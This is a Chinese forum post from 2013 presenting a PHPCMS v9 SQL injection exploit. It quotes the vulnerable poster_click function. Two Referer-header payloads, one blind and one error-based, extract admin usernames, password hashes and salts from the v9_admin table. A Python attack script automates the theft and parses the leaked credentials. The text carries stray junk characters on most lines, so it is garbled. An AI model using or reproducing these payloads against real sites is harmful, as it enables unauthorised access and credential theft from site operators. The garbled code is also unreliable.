有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:$ N! R" G5 t, S; k8 l
+ ^5 j6 t. X2 I9 L% U0 z$ c问题函数\phpcms\modules\poster\index.php
# _ M v' ~2 f& L1 b2 A8 X1 |
+ t5 S1 S; h( ]1 gpublic function poster_click() {
4 @( n# S5 @3 b0 k$id = isset($_GET['id']) ? intval($_GET['id']) : 0;+ d! ~* n7 i! i0 L6 l
$r = $this->db->get_one(array('id'=>$id));
' `. O3 T& I4 Gif (!is_array($r) && empty($r)) return false;- q- l3 Z7 d- T/ W) k1 l
$ip_area = pc_base::load_sys_class('ip_area');( ?7 e5 ~9 R" m. l3 Z& d
$ip = ip();
% o( [ a9 E6 Y5 N1 D$area = $ip_area->get($ip);
; X# H7 l N: C1 ~; m& ~$username = param::get_cookie('username') ? param::get_cookie('username') : '';: J6 U4 e% C' Y2 j6 s f2 F
if($id) {
* k# u- _% d9 r3 p% K0 I! Y3 @$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
+ D3 M9 t9 T+ i- P6 _, {$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
( A$ r3 L5 D4 E+ r e}9 I+ y' m& e( G, _. w, x
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" [4 C4 L+ r3 e* a$ i$setting = string2array($r['setting']);+ |+ `! u% B& ^9 n$ l
if (count($setting)==1) {
) o" o* ?1 t. N8 q) e0 [$url = $setting['1']['linkurl'];
! T, O( h; P1 e# ~- u3 p2 y9 U} else {! x7 D2 W }/ W- K$ y5 o
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];1 ?9 g* m$ U! f6 g
}
% \) [) m5 S* S& G% X7 {header('Location: '.$url);
, d( q3 @9 j' f5 w}- a5 V( m) P$ B! M
. K5 }- S, E4 U5 g7 ]0 }+ }7 r 0 l1 p* l" H( L' S- m3 B
, d- O1 H% P4 M+ x& a. V! k4 V& ~利用方式: i0 b) F3 v! z! N
: F" t4 e1 \% f' V* {1 p a
1、可以采用盲注入的手法:0 b8 w4 z" S) g
0 j( O% x6 p/ T
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
{3 `2 o t* j( i
: p4 z8 T& k% D; m通过返回页面,正常与否一个个猜解密码字段。
2 t/ |' ]) z* @) n+ w
5 m2 i* d: A8 C8 a2、代码是花开写的,随手附上了:
9 l4 ]4 c2 l+ K4 a3 @' A8 L6 P8 W+ F% N/ b1 R: \9 M% p9 I. ]
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 g0 D( i% {7 L( E$ u. ~
" F4 G; q/ z9 g, F3 v
此方法是爆错注入手法,原理自查。' l4 s) [# ~* U4 }
, u* Q3 }4 H7 A9 L& h: t
9 w" S6 @4 t( O. Z1 e+ U
9 f# o# Y' ~" E: i, q利用程序:
2 _7 X4 i8 H/ m0 W3 V5 p) i( B, o6 S" o# h% H! x+ S
#!/usr/bin/env python; Q" r* q) S6 o6 O0 o/ u% y
import httplib,sys,re
1 O/ Z4 f" L) K/ B) ] X6 @7 @* `
3 a0 }3 d! R/ _1 Jdef attack():
& `' f+ s* ^9 \2 s! \ A/ R: @print “Code by Pax.Mac Team conqu3r!” ^& _7 C2 F. D' X
print “Welcome to our zone!!!”
& `8 A; D$ s# F8 }2 durl=sys.argv[1]
4 h b1 G$ M; k7 V) O6 P6 ~paths=sys.argv[2]
3 S" A- n2 n* Cconn = httplib.HTTPConnection(url)
2 }% ]7 L3 ]2 D; `3 Z: Oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
$ K) [7 p& x$ J. X“Accept”: “text/plain”,# w& C) Q' D3 {
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
8 Y) s$ ]$ c6 z, mconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
- J5 W' r9 ~ f/ P* O" i5 z, A: A6 O; qr1 = conn.getresponse()
( A1 W" k. m. H% \$ n2 V( f3 K# i7 cdatas=r1.read()
6 D, C& P& Q5 J" Hdatas=re.findall(r”Duplicate entry \’\w+’”, datas)6 N' ?, z3 w" h2 O/ f
print datas[0]4 g; V9 g' h( L& q) j( I+ L
conn.close()
6 V/ S/ v, t5 G/ Bif __name__==”__main__”:5 l+ S- N! ^4 y5 `8 K" c1 M X K/ N
if len(sys.argv)<3:4 w, K1 w+ r7 O& k; M# ~6 `1 l4 }& U0 K
print “Code by Pax.Mac Team conqu3r”
# t6 p" W4 R3 C$ Fprint “Usgae:”
. r. g, N9 f! X8 l9 jprint “ phpcmsattack.py www.paxmac.org /” J2 m/ l' y: J7 M) v9 K
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
5 c) w$ r1 n5 K1 l: Gsys.exit(1)
+ D- H2 U }8 x, u6 O; g" Pattack()
. R/ x" k' H1 B }$ Z0 R! b# D$ N
( h* T5 G; o. y% U: X L8 k0 M |
发表于 2013-1-11 21:01:00
收藏
支持
反对